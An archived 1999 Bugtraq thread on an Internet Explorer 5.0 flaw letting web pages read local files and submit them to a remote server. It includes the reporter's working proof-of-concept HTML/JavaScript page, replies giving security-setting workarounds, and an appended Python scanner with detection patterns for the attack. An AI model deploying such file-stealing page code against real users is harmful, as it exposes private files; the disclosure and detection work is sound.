Date: Tue, 30 Mar 1999 19:35:16 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: IE 5.0 allows reading and sending local files to a remote server

There is a security bug in Internet Explorer 5.0, which allows reading and sending local files to a remote server.
The problem is a bug in the DHTML edit control, which allows pasting a filename in a FILE object. When the form is submitted via JavaScript, the contents of the file are sent to a remote server.

Demonstration is available at: http://www.nat.bg/~joro/fr.html

Workaround: Disable JavaScript

I would like to thank Juan Cuartango (http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE exploits, which helped me a lot for discovering this vulnerability!

Regards,
Georgi Guninski
http://www.nat.bg/~joro

-------------------------------------------------------------------------

[http://www.nat.bg/~joro/fr.html]

<HTML><HEAD><TITLE>IE 5.0 file reading</TITLE>
</HEAD>
<BODY>
There is a bug in Internet Explorer 5.0 which allows reading and sending local files.
<BR>
The file name must be known.
<BR>
Thanks to Juan Cuartango for his exploits, which helped me a lot for discovering this vulnerability!
<BR>
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>
<BR>
Workaround: Disable JavaScript
<BR>
<BR>
<INPUT TYPE=TEXT ID=A1 VALUE="C:\TEST.TXT">
<SCRIPT>
function f1()
{
 document.all.A1.select();
 document.execCommand("copy");
 dh.DOM.forms(0).elements(0).focus();
 dh.execCommand(5032);
 setTimeout("dh.DOM.forms(0).submit();",1000);
}

function f()
{
 alert("Create a file C:\\test.txt and it will be read and shown in another window \n You may need to wait some time");
 dh.loadURL("http://www.nat.bg/~joro/form3.html");
 setTimeout("f1()",2000);
}

setTimeout("f();",1000);
</SCRIPT>
<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A height=100 id=dh width=700>
</OBJECT>
</BODY>
</HTML>

-------------------------------------------------------------------------

Date: Wed, 31 Mar 1999 09:14:47 +0100
From: Andrew Tulloch <frohicky@TECHNOLOGIST.COM>
To: BUGTRAQ@netspace.org
Subject: Re: IE 5.0 allows reading and sending local files to a remote server

If you look under scripting options in security settings there is the option "Allow paste via script" simply turning this to disabled provides this result:

<paste>
See the contents of your file among the other stuff
--------------------------------------------------------------------------------
-----------------------------7cf26c3b6a8
Content-Disposition: form-data; name = "a"; filename=""
Content-Type: application/octet-stream

-----------------------------7cf26c3b6a8--
</paste>

which as far as I see has disabled the reading of local files and is a little less drastic than disabling all JavaScript.

Regards,
Andrew Tulloch

-------------------------------------------------------------------------

Date: Wed, 31 Mar 1999 14:05:21 -0800
From: "Stephen Purpura (MSFDC-JV)" <v-spurpu@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5.0 allows reading and sending local files to a remote server

There is another workaround.
In IE5, if you use the "built in" feature to limit scripted paste operations then the problem doesn't seem to manifest. Try the following and go to the sample implementation:

Tools menu --> Internet options --> security tab --> custom level --> allow paste operations via script = prompt or disable

Stephen
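
-------------------------------------------------------------------------

Added example, not part of the original thread and not code from any of its authors: a static content check that flags HTML combining the two ingredients the advisory describes, the DHTML edit control (CLSID as in the demo's OBJECT tag) and a scripted paste. The names scan, SAMPLE and BENIGN are assumptions of this sketch; both inputs are constructed, and the "paste" string form is a generalization beyond the numeric command the demo uses.

```python
import re
from html.parser import HTMLParser

# CLSID of the DHTML edit control, copied from the <OBJECT> tag in the advisory.
DHTML_EDIT_CLSID = "2d360201-fff5-11d1-8d03-00a0c959bc0a"
# Script steps seen in the demo page: clipboard copy, the numeric execCommand
# used for the paste step (or its string form), and a scripted form submit.
SCRIPT_PATTERNS = {
    "scripted-copy": re.compile(r"execCommand\s*\(\s*[\"']copy[\"']", re.I),
    "scripted-paste": re.compile(r"execCommand\s*\(\s*(5032|[\"']paste[\"'])", re.I),
    "scripted-submit": re.compile(r"\.submit\s*\(", re.I),
}

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = set()
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            classid = (dict(attrs).get("classid") or "").lower()
            if classid.replace("clsid:", "").strip("{} ") == DHTML_EDIT_CLSID:
                self.findings.add("dhtml-edit-control")
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for name, pattern in SCRIPT_PATTERNS.items():
                if pattern.search(data):
                    self.findings.add(name)

def scan(html):
    """Return the findings and whether the page should be flagged."""
    scanner = _Scanner()
    scanner.feed(html)
    scanner.close()
    # Flag only the combination from the advisory: control plus scripted paste.
    flag = {"dhtml-edit-control", "scripted-paste"} <= scanner.findings
    return {"findings": sorted(scanner.findings), "flag": flag}

# Constructed inputs: SAMPLE is cut down from the demo page, BENIGN is not flagged.
SAMPLE = """<SCRIPT>document.execCommand("copy"); dh.execCommand(5032);
setTimeout("dh.DOM.forms(0).submit();",1000);</SCRIPT>
<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A id=dh></OBJECT>"""
BENIGN = "<form></form><script>document.forms[0].submit()</script>"
```

A flagged page is a candidate for review rather than proof of abuse; the per-browser setting named in the replies above (allow paste operations via script = prompt or disable) remains the mitigation.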